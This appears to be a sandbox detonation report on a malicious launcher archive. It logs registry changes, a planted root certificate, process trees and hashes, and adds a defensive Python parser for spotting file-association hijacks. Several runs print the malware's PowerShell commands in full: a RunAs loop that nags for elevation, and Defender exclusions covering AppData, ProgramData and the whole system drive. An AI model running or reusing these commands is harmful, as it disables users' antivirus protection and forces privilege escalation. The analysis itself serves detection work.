| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.rev\ = "WinRAR.REV" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe,0" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
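The "Modifies system executable filetype association" signature above fires because WinRAR.exe registers its two shell-extension CLSIDs ({B41DB860-64E4-11D2-9906-E49FADC173CA} and {B41DB860-8EE4-11D2-9906-E49FADC173CA}) as PropertySheetHandlers under exefile. A property-sheet handler adds a tab to a file's Properties dialog; it does not change what runs when an .exe is opened. The only shell\open\command values written in this run belong to WinRAR's own ProgIDs (WinRAR, WinRAR.REV, WinRAR.ZIP) and point at the WinRAR.exe copy inside the extracted archive. The key that would indicate a genuine hijack is <ProgID>\shell\open\command for an executable ProgID such as exefile.

The Python below is an added example, not part of the report. It parses rows in this report's table format, groups the registry writes by ProgID and handler type, and flags only shell\open\command writes under executable ProgIDs. The sample rows are a subset copied from the table above; the single contrast row is constructed (the svc.exe path is made up) to show what a real exefile hijack would look like in the same format.

```python
import re
from collections import defaultdict

ROW = re.compile(r"^\|\s*(.*?)\s*\|\s*(.*?)\s*\|\s*(.*?)\s*\|\s*(.*?)\s*\|$")
CLSID = re.compile(r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}")
CLASS = re.compile(r"\\Classes\\([^\\]+)", re.I)
HANDLER = re.compile(r"\\shellex\\([^\\]+)", re.I)
# ProgIDs whose shell\open\command decides what runs when a user opens a program file.
EXEC_TYPES = {"exefile", "batfile", "cmdfile", "comfile", "scrfile", "piffile"}


def parse_rows(text: str) -> list[dict]:
    """Turn '| op | indicator | process | target |' rows into dicts with key and value split."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m or m.group(1) == "Description":
            continue
        op, indicator, process, _target = m.groups()
        key, _, value = indicator.partition(" = ")
        if len(value) >= 2 and value[0] == value[-1] == '"':
            # the report quotes string data and escapes embedded quotes and backslashes
            value = value[1:-1].replace('\\"', '"').replace("\\\\", "\\")
        rows.append({"op": op, "key": key.rstrip("\\"), "value": value, "process": process})
    return rows


def classify(key: str):
    """(ProgID or extension, kind) for a key under Software\\Classes; (None, 'other') otherwise."""
    m = CLASS.search(key)
    if not m:
        return None, "other"
    cls, k = m.group(1), key.lower()
    if "\\shell\\open\\command" in k:
        return cls, "open_command"
    if "\\shellex\\" in k:
        return cls, "shell_extension"
    if k.endswith("\\defaulticon"):
        return cls, "default_icon"
    if cls.startswith("."):
        return cls, "extension_map"
    return cls, "other"


def summarize(text: str) -> dict:
    out = {"classes": set(), "clsids": set(), "shell_extensions": defaultdict(set),
           "open_commands": {}, "exec_hijacks": []}
    for r in parse_rows(text):
        cls, kind = classify(r["key"])
        out["clsids"].update(CLSID.findall(r["key"] + " " + r["value"]))
        if cls is None:
            continue
        out["classes"].add(cls)
        if kind == "shell_extension":
            h = HANDLER.search(r["key"])
            if h:
                out["shell_extensions"][cls].add(h.group(1))
        elif kind == "open_command" and r["value"]:
            out["open_commands"][cls] = r["value"]
            if cls.lower() in EXEC_TYPES:          # this, not a shellex handler, is a hijack
                out["exec_hijacks"].append((cls, r["value"], r["process"]))
    return out


WINRAR = r"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe"
CLASSES = r"\REGISTRY\MACHINE\SOFTWARE\Classes"
# Sample rows: a subset of the table above, (op, indicator) with WinRAR.exe as the process.
SAMPLE_ROWS = "\n".join(f"| {op} | {ind} | {WINRAR} | N/A |" for op, ind in [
    ("Key created", CLASSES + r"\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}"),
    ("Set value (str)", CLASSES + r"\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ "),
    ("Set value (str)", CLASSES + r'\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}"'),
    ("Set value (str)", CLASSES + r'\Folder\ShellEx\DragDropHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}"'),
    ("Set value (str)", CLASSES + r'\WinRAR\shellex\DropHandler\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}"'),
    ("Key created", CLASSES + r"\.rev"),
    ("Set value (str)", CLASSES + r'\.rev\ = "WinRAR.REV"'),
    ("Set value (str)", CLASSES + r'\WinRAR.REV\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe\" \"%1\""'),
])
# Constructed contrast row (not from the report; the svc.exe path is made up): what an actual
# change to the command run for .exe files would look like in this format.
CONTRAST_ROW = ("\n| Set value (str) | " + CLASSES +
                r'\exefile\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\svc.exe\" \"%1\""'
                r" | C:\Users\Admin\AppData\Roaming\svc.exe | N/A |")

if __name__ == "__main__":
    s = summarize(SAMPLE_ROWS)
    print("ProgIDs touched:", sorted(s["classes"]))
    print("shell extensions:", {k: sorted(v) for k, v in s["shell_extensions"].items()})
    print("open commands:", s["open_commands"])
    print("executable-type hijacks:", s["exec_hijacks"] or "none")
    print("with contrast row:", summarize(SAMPLE_ROWS + CONTRAST_ROW)["exec_hijacks"])
```

On the rows from this report the hijack list stays empty and exefile shows up only under PropertySheetHandlers; the same parser applied to the contrast row returns one exefile entry, which is the case this signature name suggests but the run does not contain. The WinRAR.exe here is nevertheless an unsigned copy launched from %TEMP% that registers itself system-wide and contacts notifier.rarlab.com, so it still belongs in the file inventory of the archive.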
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = [binary blob omitted] | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | notifier.rarlab.com | udp |
| DE | 51.195.68.172:80 | notifier.rarlab.com | tcp |
| DE | 51.195.68.172:443 | notifier.rarlab.com | tcp |
| DE | 51.195.68.172:443 | notifier.rarlab.com | tcp |
Files
Analysis: behavioral27
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 03:23
Platform
win7-20240220-en
Max time kernel
1563s
Max time network
1569s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\wget.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\wget.exe"
Network
Files
memory/2196-0-0x0000000000400000-0x00000000008F2000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 02:52
Platform
win7-20240221-en
Max time kernel
1566s
Max time network
1573s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Launcher.dll,#1
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 02:52
Platform
win10v2004-20240226-en
Max time kernel
1381s
Max time network
1177s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Launcher.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.73.42.20.in-addr.arpa | udp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 02:52
Platform
win7-20240215-en
Max time kernel
1565s
Max time network
1572s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\RIBTwoUATqEp.ps1
Network
Files
memory/2588-5-0x000007FEF5CF0000-0x000007FEF668D000-memory.dmp
memory/2588-4-0x000000001B780000-0x000000001BA62000-memory.dmp
memory/2588-7-0x0000000002CD0000-0x0000000002D50000-memory.dmp
memory/2588-8-0x000007FEF5CF0000-0x000007FEF668D000-memory.dmp
memory/2588-9-0x0000000002CD0000-0x0000000002D50000-memory.dmp
memory/2588-6-0x0000000001E80000-0x0000000001E88000-memory.dmp
memory/2588-10-0x0000000002CD0000-0x0000000002D50000-memory.dmp
memory/2588-11-0x000007FEF5CF0000-0x000007FEF668D000-memory.dmp
memory/2588-12-0x0000000002CDB000-0x0000000002D42000-memory.dmp
memory/2588-13-0x0000000002CD0000-0x0000000002D50000-memory.dmp
Analysis: behavioral29
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 03:23
Platform
win7-20240221-en
Max time kernel
1558s
Max time network
1565s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\vhXDYuQByxPS.ps1
Network
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 02:52
Platform
win10v2004-20240226-en
Max time kernel
1758s
Max time network
1173s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\RIBTwoUATqEp.ps1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x150 0x468
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.171.91.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.98.74.40.in-addr.arpa | udp |
Files
memory/2400-5-0x000001944E760000-0x000001944E782000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qyao1lpi.kqd.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
Analysis: behavioral19
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 02:56
Platform
win7-20240221-en
Max time kernel
1796s
Max time network
1820s
Command Line
Signatures
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
Network
Files
memory/2992-0-0x0000000000100000-0x0000000000101000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CabA0F3.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\Local\Temp\TarA124.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 753df6889fd7410a2e9fe333da83a429 |
| SHA1 | 3c425f16e8267186061dd48ac1c77c122962456e |
| SHA256 | b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78 |
| SHA512 | 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444 |
C:\Users\Admin\AppData\Local\Temp\TarA38F.tmp
| MD5 | dd73cead4b93366cf3465c8cd32e2796 |
| SHA1 | 74546226dfe9ceb8184651e920d1dbfb432b314e |
| SHA256 | a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22 |
| SHA512 | ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8dc1be7df4bc029baedebb04d094616c |
| SHA1 | dba3192b779f5827f90e2211daa9f1981e952b61 |
| SHA256 | 2573934d570053b3f6156d253abd5c7bf3a5a397a194ab83851319791e7f706d |
| SHA512 | 066b5364a5f31c17f1e471935610908a3e12e19ffefa972657b8ad34ebcc106b199f5ea9c9b088b36b32b0e3edaa4a4a6aacb46e4077ccafa9e13b930feb3df1 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 8ffd86dd8fa3b504af4c7b7d95780ca0 |
| SHA1 | 6169e677caf912a8de7c56b5cbdd64836b806691 |
| SHA256 | b7d5b14acb517db8618b265f32c3318f26813c9c588bf46d8706590dd7973f87 |
| SHA512 | 0b48c74ed4ac2e0feb0bbd23ee3102cb2511e1d327ffba6cc5f46a0a50ff7c9d6676f6b1d00f100aa31adc134ed3c975730d891aca43116b666123e9bb5f99bf |
Analysis: behavioral30
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 03:23
Platform
win10v2004-20240226-en
Max time kernel
1586s
Max time network
1573s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\vhXDYuQByxPS.ps1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x514 0x50c
Network
| Country | Destination | Domain | Proto |
| GB | 96.16.110.114:80 | tcp | |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.223.142.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.201.86.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1yj0szi3.ndw.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
Analysis: behavioral20
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 02:56
Platform
win10v2004-20240226-en
Max time kernel
1676s
Max time network
1175s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
